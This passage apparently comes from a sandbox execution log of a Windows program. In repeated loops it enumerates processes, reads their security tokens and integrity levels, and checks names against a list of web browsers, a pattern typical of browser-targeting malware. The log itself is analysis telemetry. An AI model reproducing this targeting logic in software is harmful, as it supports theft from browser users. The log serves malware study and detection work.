[3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0524.812] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0524.812] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0524.812] GetLastError () returned 0x7a [0524.813] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0524.813] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0524.813] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0524.813] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0524.813] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0524.813] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0524.813] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0524.813] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0524.813] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0524.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0524.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x2cc [0524.814] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0524.814] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0524.814] GetLastError () returned 0x7a [0524.814] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0524.814] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0524.814] CloseHandle (hObject=0x5d8) returned 1 [0524.814] CloseHandle (hObject=0x2cc) returned 1 [0524.814] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0524.815] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0524.815] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0524.815] GetLastError () returned 0x7a [0524.815] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0524.815] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0524.815] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0524.815] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0524.815] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0524.815] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0524.815] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0524.816] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0524.816] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0524.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x2cc [0524.816] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0524.816] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0524.816] GetLastError () returned 0x7a [0524.816] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0524.816] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0524.816] CloseHandle (hObject=0x5d8) returned 1 [0524.816] CloseHandle (hObject=0x2cc) returned 1 [0524.817] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0524.817] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0524.817] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0524.817] GetLastError () returned 0x7a [0524.817] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0524.817] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0524.817] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0524.817] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0524.817] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0524.818] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0524.818] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0524.818] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0524.818] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0524.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0524.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x2cc [0524.818] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0524.818] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0524.818] GetLastError () returned 0x7a [0524.818] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0524.818] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0524.819] CloseHandle (hObject=0x5d8) returned 1 [0524.819] CloseHandle (hObject=0x2cc) returned 1 [0524.819] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0524.819] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0524.819] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0524.819] GetLastError () returned 0x7a [0524.819] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0524.819] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0524.820] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0524.820] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0524.820] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0524.820] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0524.820] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0524.820] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0524.820] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0524.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0524.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0524.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0524.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x2cc [0524.821] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0524.821] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0524.821] GetLastError () returned 0x7a [0524.821] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0524.821] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0524.821] CloseHandle (hObject=0x5d8) returned 1 [0524.821] CloseHandle (hObject=0x2cc) returned 1 [0524.821] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0524.821] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0524.822] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0524.822] GetLastError () returned 0x7a [0524.822] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0524.822] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0524.822] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0524.822] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0524.822] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0524.822] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0524.822] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0524.822] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0524.823] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0524.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0524.823] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0524.824] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0526.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa0b8) returned 0xc0000004 [0526.836] VirtualAlloc (lpAddress=0x0, dwSize=0xb0b8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0526.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb0b8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0526.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0526.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0526.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0526.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0526.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0526.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0526.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0526.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0526.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0526.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0526.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0526.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0526.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0526.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0526.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0526.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0526.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0526.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0526.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0526.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0526.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0526.840] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0526.840] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0526.840] GetLastError () returned 0x7a [0526.840] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0526.840] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0526.840] CloseHandle (hObject=0x29c) returned 1 [0526.840] CloseHandle (hObject=0x298) returned 1 [0526.840] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0526.840] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0526.840] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0526.840] GetLastError () returned 0x7a [0526.840] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0526.841] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0526.841] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0526.841] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0526.841] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0526.841] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0526.841] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0526.841] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0526.841] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0526.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0526.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0526.841] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0526.841] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0526.841] GetLastError () returned 0x7a [0526.841] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0526.841] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0526.841] CloseHandle (hObject=0x29c) returned 1 [0526.841] CloseHandle (hObject=0x298) returned 1 [0526.841] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0526.841] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0526.841] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0526.841] GetLastError () returned 0x7a [0526.841] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0526.841] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0526.841] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0526.841] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0526.841] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0526.841] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0526.841] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0526.841] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0526.841] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0526.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0526.841] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0526.841] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0526.841] GetLastError () returned 0x7a [0526.841] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0526.841] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0526.841] CloseHandle (hObject=0x29c) returned 1 [0526.841] CloseHandle (hObject=0x298) returned 1 [0526.841] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0526.842] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0526.842] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0526.842] GetLastError () returned 0x7a [0526.842] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0526.842] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0526.842] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0526.842] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0526.842] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0526.842] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0526.842] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0526.842] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0526.842] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0526.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0526.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0526.842] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0526.842] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0526.842] GetLastError () returned 0x7a [0526.842] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0526.842] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0526.842] CloseHandle (hObject=0x29c) returned 1 [0526.842] CloseHandle (hObject=0x298) returned 